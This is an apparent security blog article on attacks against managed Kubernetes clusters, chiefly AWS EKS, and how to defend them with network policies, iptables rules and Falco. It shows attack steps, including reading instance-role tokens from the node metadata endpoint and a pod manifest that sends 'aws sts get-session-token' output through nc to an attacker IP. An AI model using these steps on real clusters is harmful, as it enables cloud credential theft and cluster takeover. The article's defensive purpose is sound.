Managed cluster: how to secure it?

13 April 2023

All cloud providers have a managed Kubernetes cluster service. While they are widely adopted for their operational benefits, few DevSecOps teams have a handle on the associated security risks. I present the main dangers of a managed cluster, and how to deal with them.

Why use a managed cluster?

A managed cluster is a Kubernetes cluster provided as a PaaSwhere much of the management is handled by the cloud provider. These services are widely used because they greatly simplify cluster management for Ops teams. The benefits of using managed clusters include:

Simple installation process
The cluster utilizes cloud features for complex operations such as disk management, provisioning of nodes and load balancers, etc.
The cloud provider manages the control plane entirely
Automatic updates can be implemented

The security gain of using managed clusters seems promising, as the shared responsibility model guarantees that the Cloud Manager ensures the security of the control plane, and Kubernetes security best practices are implemented by default.

However, there are critical risks associated with the many interconnections between Kubernetes and the Cloud. These risks will be addressed in the rest of this article.

This article will focus solely on issues related to managed clusters and will not cover general Kubernetes cluster security best practices. For those interested in learning more about Kubernetes best practices, the official documentation is quite comprehensive.

I propose discussing the attacker's point of view to better understand the primary risks of a managed cluster.

How can a managed cluster be compromised?

The entry points for an attacker on a managed cluster are:

The API Server: It should never be made public. Filtering solutions such as VPN, administration bastion, or IP filtering through whitelisting should always be used to protect access to the API Server. It is important to note that anonymous access to the API is disabled by default in managed clusters.
The Cloud: This vector is specific to managed clusters. It is possible for attackers to access clusters via IAM (Identity and Access Management) rights. For example, in AWS, the following command allows an attacker to obtain a kubeconfig file and subsequently access the cluster (although access to the Server API is still required):

aws eks update-kubeconfig --name <cluster_name>
kubectl get pods

Images deployed in the cluster: Compromising a pod via a malicious docker image or compromising the deployment pipeline can allow an attacker to gain initial access to the cluster.
Ingress: Any application flaw of the Remote Code Execution type can allow an attacker to execute commands on a pod.

This is the last and most likely entry point for an external attacker who does not have access to the Cloud Provider, the API Server, or the deployment environment.

Let us assume that an attacker has taken control of a pod. There are several options to elevate their privileges:

Via a service account: Using the pod's service account to perform actions on the cluster or on the cloud. The default service account has no rights.
Elevating privileges to access the node: It is sometimes possible to escape from the pod to access the node (via bad security configuration or a vulnerable kernel). Access to the node often means the total compromise of the cluster.
Via network attacks: By definition, a pod can reach other pods and potentially join nodes. Several network attacks are possible here, for example:
- Information leakage via the read-only API of the Kubelets on port 10255
- Information leakage via Prometheus metrics
- DNS Spoofing
Via node metadata: This attack vector is by far the most dangerous attack for managed clusters and is the most exploited by attackers.

Focus on metadata

In the rest of this article, we will use EKS as an example, but you can apply the same attacks to AKS and GKE. The operation is essentially the same.

Every server instance in the cloud has metadata, a collection of information necessary for the server to function properly. The metadata of an AWS instance is available at the IP address: http://169.254.169.254/latest/meta-data/

The nodes of a managed cluster are EC2 instances, which therefore have metadata.

This address is by default reachable from the pods. The metadata contains a lot of valuable information for an attacker:

Information about the instance: its AMI, hostname, id, IP address, zone, ...
Information about the cluster: the cluster name, the API Server certificate, the API Server address, ...
AWS access token linked to the instance role:

metadata_token

AWS officially recommended node IAM rights are:

AmazonEKSWorkerNodePolicy
AmazonEC2ContainerRegistryReadOnly

These policies give a lot of rights on the cloud. The attacker can use these rights in several ways:

Perform actions on AWS:
- List all VPCs, subnets, and Security Groups of the AWS account.
- Describe all EC2 instances (and their user-data, which often contain valuable information)
- Remove all network interfaces
- List and pull any Docker images from the ECR
Get access to the Kubernetes cluster as a member of the system:node group :

aws eks update-kubeconfig --name <cluster_name>

- Read access to all pods (and their environment variables)
- Read access to all secrets and configmaps that are used by its pods.
- Access to the list of nodes, namespaces

Once the attacker can impersonate a node, it's only a matter of time before he gets the cluster-admin rights.

Forbidding access to metadata from pods is therefore absolutely critical in cluster security. Several techniques are possible depending on the situation:

Via a Network Policy for example, if you already use them. Be careful, on AWS clusters that use the default network plugin aws-cni, Network Policy is not applied.

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-metadata-access
  namespace: example
spec:
  podSelector: {}
  policyTypes:
  - Egress
  egress:
  - to:
    - ipBlock:
        cidr: 0.0.0.0/0
        except:
        - 169.254.169.254/32

Via an iptables command on the nodes (if the pods have interfaces starting with eni ):

yum install -y iptables-services
iptables --insert FORWARD 1 --in-interface eni+ --destination 169.254.169.254/32 --jump DROP
iptables-save | tee /etc/sysconfig/iptables 
systemctl enable --now iptables

Cloud compromise via Kubernetes

Metadata is one thing but also watch out for Kubernetes service accounts that have rights to the Cloud Providers. The cloud is a gateway to the Kubernetes cluster, and vice versa!

It is very easy and convenient to give pods rights on the cloud via a service account. Once the configuration steps are done, you just have to annotate the Kubernetes service account in this way:

apiVersion: v1
kind: ServiceAccount
metadata:
  annotations:
    eks.amazonaws.com/role-arn: arn:aws:iam::<ACCOUNT_ID>:role/<IAM_ROLE_NAME>

Any pod using this service account will then enjoy the rights of the IAM role on the Cloud environment. But an attacker will also be able to take advantage of these rights if, for example:

He compromised this pod:

aws sts get-session-token
{
    "Credentials": {
        "AccessKeyId": "AKIAIOSFODNN7EXAMPLE",
        "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYzEXAMPLEKEY",
        "SessionToken": "AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvLXCrrrUtdnniCEXAMPLE/IvU1dYUg2RVAJBanLiHb4IgRmpRV3zrkuWJOgQs8IZZaIv2BXIa2R4OlgkBN9bkUDNCJiBeb/AXlzBBko7b15fjrBs2+cTQtpZ3CYWFXG8C5zqx37wnOE49mRl/+OtkIKGO7fAE",
        "Expiration": "2020-05-19T18:06:10+00:00"
    }
}

He has the right to create pods. He just needs to create a pod with this service account :

apiVersion: v1
kind: Pod
metadata:
  labels:
    app: legitimate
spec:
  containers:
  - name: main
    image: alpine
    imagePullPolicy: IfNotPresent
    command: ["/bin/sh"]
    args: ["-c", 'aws sts get-session-token | nc -nv <attack_ip> <attack_port>; sleep 100000']
  serviceAccountName: <service_account_much_privileged>
  automountServiceAccountToken: true

(For this last point, good protection is not to lightly give the right to create pods in namespaces that contain very privileged service accounts).

Bonus: Intrusion detection

If you have applied all the good security practices and taken into account all the specificities related to your Cloud Provider, there is still one important step left before being state of the art: intrusion detection!

This practice consists in reducing the impact of 0-day vulnerabilities, human errors, or any other type of intrusion despite the protections in place. The goal is to detect malicious behavior as soon as possible and to alert the teams.

There is an open-source product to detect attacks in Kubernetes carried by the CNCF: Falco Security!

article_falco

Falco can be deployed very simply as a daemonSet and monitors activity at the pod, kernel, and API Server levels. The diversity of probes allows it to detect most of the classic patterns of compromise.

Moreover, it is possible to automatically send alerts via Slack, SMS, or email, to warn the teams as soon as possible

Conclusion

We saw the classic attack vectors of a managed Kubernetes cluster, as well as the risks involved and the associated protections. We also discovered Falco, a powerful tool to detect intrusions in your Kubernetes cluster.

For more information, here is a practical demonstration of a Kubernetes cluster attack, from one I gave.